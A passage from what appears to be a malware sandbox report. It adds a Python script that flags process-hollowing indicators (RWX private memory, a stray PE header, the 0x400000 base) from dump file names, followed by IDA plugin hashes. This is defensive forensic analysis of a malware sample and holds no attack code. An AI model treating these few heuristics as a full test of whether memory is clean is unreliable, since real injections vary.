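        reasons.append("pages are PAGE_EXECUTE_READWRITE")
    if region.mem_type == MEM_PRIVATE:
        reasons.append("region is MEM_PRIVATE, not a file-backed MEM_IMAGE section")
    if region.based_on_pe and region.mem_type != MEM_IMAGE:
        reasons.append("PE header present outside an image mapping")
    if region.base == DEFAULT_IMAGE_BASE_32:
        reasons.append("region starts at the 32-bit default image base 0x400000")
    return reasons


# The dump cited in the report (same file name as on this page).
REPORT_DUMP = "0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp"
# Constructed benign counterpart (not from the report): an execute-read image
# mapping at a relocated base, i.e. what a normally loaded module looks like.
BENIGN_DUMP = "0000000F.00000002.339863709.0000000010000000.00000020.00001000.01000000.00000000.sdmp"

if __name__ == "__main__":
    for name in (REPORT_DUMP, BENIGN_DUMP):
        r = parse_dump_name(name, based_on_pe=True)
        print(f"pid={r.pid} base={r.base:#x} protect={r.protect:#x} type={r.mem_type:#x}")
        for reason in hollowing_indicators(r) or ["no hollowing indicators"]:
            print("  -", reason)
```

Run against the report's own dump name, every indicator fires: RWX, private memory, a PE header where no image is mapped, and the 0x400000 base, which is consistent with the "Sample uses process hollowing technique" signature. The constructed benign name produces no indicators. The same region properties are what a memory-forensics pass (for example scanning VAD entries for RWX private regions that start with "MZ") would key on in a live incident.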
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                    • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                                                                                    • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                                                                                    • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                                                                                    • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%